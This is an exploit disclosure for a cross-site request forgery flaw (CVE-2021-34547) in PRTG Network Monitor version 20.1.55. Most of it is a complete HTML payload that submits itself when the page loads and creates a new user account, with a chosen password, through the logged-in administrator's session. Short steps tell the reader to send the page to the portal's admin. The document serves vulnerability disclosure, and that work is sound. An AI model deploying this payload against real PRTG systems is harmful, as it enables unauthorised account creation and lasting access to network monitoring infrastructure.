PRTG Network Monitoor v20.1.55 - CSRF (CVE-2021-34547)
Cross Site Request Forgery (CSRF) on PRTG Network Monitor version 20.1.55
Exploit Title: Cross Site Request Forgery (CSRF)
Date: 10/06/2021
Exploit Author: Likhith CV
Vendor Homepage: https://www.paessler.com/
Software Link: https://www.paessler.com/prtg
Test on Version: 20.1.55.1775+
Affected Versions: not tested on other versions
CVE assigned: CVE-2021-34547
Observation
It was observed that anti csrf tokens are not implemented throughout PRTG Network Monitor v 20.1.55 Application
Severity: High
Steps To reproduce:
To exploit this vulnerability an attacker can simply create a HTML form that would submit a user account creation request and share the link with the victim.On clicking the link , the user account creation request will be triggered in background and it shall create a user account from his valid session.
Any action can be performed on behalf of logged in user but for demonstration user account creation on behalf of admin is shown as example
- Create a CSRF payload as following
<html>
<body onload="onLoadSubmit()">
<script>history.pushState('', '', '/')</script>
<form action="https://[domain]/editsettings" name="cu2" method="POST" enctype="multipart/form-data">
<input type="hidden" name="login_" value="User_test2" /> <!--username-->
<input type="hidden" name="name_" value="User_test2" /> <!--name-->
<input type="hidden" name="email_" value="cvlikhith@gmail.com" /> <!--email-->
<input type="hidden" name="email" value="" />
<input type="hidden" name="passwordradio" value="1" />
<input type="hidden" name="password1" value="Hello123" /> <!--password-->
<input type="hidden" name="password_" value="" /> <!--confirm_password-->
<input type="hidden" name="password2" value="Hello123" />
<input type="hidden" name="passhash" value="" />
<input type="hidden" name="lastackedsensordeprecationgrowl" value="" />
<input type="hidden" name="usertype_" value="0" />
<input type="hidden" name="allowack_" value="0" />
<input type="hidden" name="allowpwchange_" value="0" />
<input type="hidden" name="primarygroup_" value="201|PRTG Users Group|||0|" /> <!--group-->
<input type="hidden" name="primarygroup" value="201" />
<input type="hidden" name="active_" value="1" />
<input type="hidden" name="autorefreshtype_" value="1" />
<input type="hidden" name="autorefreshinterval_" value="30" />
<input type="hidden" name="playsound_" value="0" />
<input type="hidden" name="homepage_" value="" />
<input type="hidden" name="timezone_" value="Dateline Standard Time|(UTC-12:00) International Date Line West" />
<input type="hidden" name="dateformat_" value="0" />
<input type="hidden" name="theme_" value="0" />
<input type="hidden" name="ticketmail_" value="1" />
<input type="hidden" name="objecttype" value="user" />
<input type="hidden" name="id" value="new" />
<input type="hidden" name="targeturl" value="/systemsetup.htm?tabid=5" />
<input type="submit" value="Submit request" />
</form>
<script language="javascript">
function onLoadSubmit() {
document.cu2.submit();
}
</script>
</body>
</html>- Send this payload to admin of the PRTG Portal
- once Admin opens your payload new user account will be created





